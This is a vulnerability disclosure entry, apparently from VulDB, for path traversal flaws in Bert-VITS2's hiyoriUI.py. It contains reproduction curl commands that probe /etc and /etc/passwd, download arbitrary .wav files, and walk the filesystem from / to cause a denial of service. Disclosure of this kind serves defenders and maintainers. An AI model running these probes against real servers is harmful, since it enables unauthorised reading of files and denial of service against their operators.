| Titel | fishaudio Bert-VITS2 latest (commit 724d0b2) Path Traversal (CWE-22) |
|---|
| Beschreibung | # Technical Details
Multiple Path Traversal vulnerabilities exist in the `_get_all_models()`, `get_audio()`, and `random_example()` functions in `hiyoriUI.py` of Bert-VITS2.
The application fails to validate or sanitize user-supplied path parameters before passing them to os.listdir(), os.path.isfile(), FileResponse(), and os.walk(), and binds the server to x.x.x.x with no authentication, exposing all endpoints to unauthenticated remote attackers.
# Vulnerable Code
File: hiyoriUI.py (L510–513)
Method: _get_all_models()
Why: The user-controlled root_dir is passed directly to os.listdir(), enabling arbitrary directory enumeration via differential HTTP responses (200 vs 500).
File: hiyoriUI.py (L716–727)
Method: get_audio()
Why: The user-controlled path is passed to os.path.isfile() before extension validation, creating a file existence oracle (status 18 vs 19). Any .wav file on the filesystem can be downloaded via FileResponse().
File: hiyoriUI.py (L634–654)
Method: random_example()
Why: The user-controlled root_dir is passed directly to os.walk(), enabling recursive traversal of arbitrary directories and potential DoS via full filesystem walk.
# Reproduction
1. Enumerate directories (existence oracle):
curl "http://<target>:5000/models/get_local?root_dir=/etc" # HTTP 200 = exists
curl "http://<target>:5000/models/get_local?root_dir=/nonexistent" # HTTP 500 = does not exist
2. Probe arbitrary file existence:
curl "http://<target>:5000/tools/get_audio?path=/etc/passwd" # status 19 = file exists
curl "http://<target>:5000/tools/get_audio?path=/etc/nothere" # status 18 = file missing
3. Read arbitrary .wav file:
curl "http://<target>:5000/tools/get_audio?path=/path/to/secret.wav" --output stolen.wav
4. Trigger DoS via full filesystem walk:
curl "http://<target>:5000/tools/random_example?root_dir=/"
# Impact
- Unauthenticated remote filesystem enumeration (directory and file existence oracle)
- Arbitrary .wav file read (sensitive voice/audio data exfiltration)
- Denial of Service via unbounded os.walk("/") recursive filesystem traversal
- Reconnaissance enablement for further targeted attacks (SSH keys, config files) |
|---|
| Quelle | ⚠️ https://gist.github.com/YLChen-007/99859f4f836cca523a5982645e7fdd97 |
|---|
| Benutzer | Eric-b (UID 96354) |
|---|
| Einreichung | 23.04.2026 09:32 (vor 1 Monat) |
|---|
| Moderieren | 16.05.2026 19:37 (23 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 364382 [fishaudio Bert-VITS2 bis 8f7fbd8c4770965225d258db548da27dc8dd934c Model hiyoriUI.py _get_all_models Directory Traversal] |
|---|
| Punkte | 20 |
|---|